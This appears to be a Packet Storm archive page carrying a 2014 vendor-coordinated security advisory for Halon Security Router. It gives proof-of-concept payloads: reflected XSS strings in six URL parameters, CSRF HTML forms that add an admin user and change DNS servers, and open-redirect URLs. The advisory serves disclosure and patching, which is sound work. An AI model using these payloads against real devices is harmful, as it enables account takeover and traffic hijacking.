exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Halon Security Router XSS / CSRF / Open Redirect

Halon Security Router XSS / CSRF / Open Redirect
Posted Apr 8, 2014
Authored by Juan Manuel Garcia

Halon Security Router suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 6a89ccc532c3b03e26dc887d1ad606c3b5effc18b384765f25f3a06bdd2836bd

Halon Security Router XSS / CSRF / Open Redirect

Change Mirror Download
ADVISORY INFORMATION
Advisory Name: Multiple Security Vulnerabilities in Halon Security Router
Date published: 2014-04-07
Vendors contacted: Halon Security (http://www.halon.se)
Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)



VULNERABILITIES INFORMATION
Vulnerabilities:
1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}
2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}
3. Open Redirect {OWASP Top 10 2013-A10}

Severities:
1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.

Affected Platforms: Software, virtual and hardware

Local / Remote: Remote

Vendor Status: Patched



VULNERABILITIES DESCRIPTION
1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
3. Open Redirect: https://www.owasp.org/index.php/Open_redirect



TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS
1- Reflected XSS:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
Parameter: log
http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
Parameter: file
http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
Parameter: graph
http://sr.demo.halon.se/commands/?command='+alert(1)+'
Parameter: command
http://sr.demo.halon.se/system/users/?id='+alert(1)+'
Parameter: id
http://sr.demo.halon.se/config/?uri='+alert(1)+'
Parameter: uri
Other parameters of the application might also be affected.


2- CSRF:
At least the following functions are vulnerable:
Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user

<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="old_user" value=""/>
<input type="hidden" name="user" value="hacker"/>
<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
<input type="hidden" name="class" value=""/>
<input type="hidden" name="password" value="1234"/>
<input type="hidden" name="password2" value="1234"/>
</form>
</body>
</html>

DNS configuration: http://xxx.xxx.xxx.xxx/network/dns

<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/network/dns/">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="name-servers" value="8.8.8.8"/>
<input type="hidden" name="search-domain" value=""/>
<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
</form>
</body>
</html>

Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
Other functions of the application might also be affected.


3- Open Redirect:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
Parameter: uri
http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
Parameter: uri
Other parameters of the application might also be affected.



SOLUTION
Install / Upgrade to Security router (SR) v3.2r2
REPORT TIMELINE

2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.
2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.
2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.
2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.
2014-04-07: IT Force published the advisory.



CONTACT INFORMATION
www.itforce.tk

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close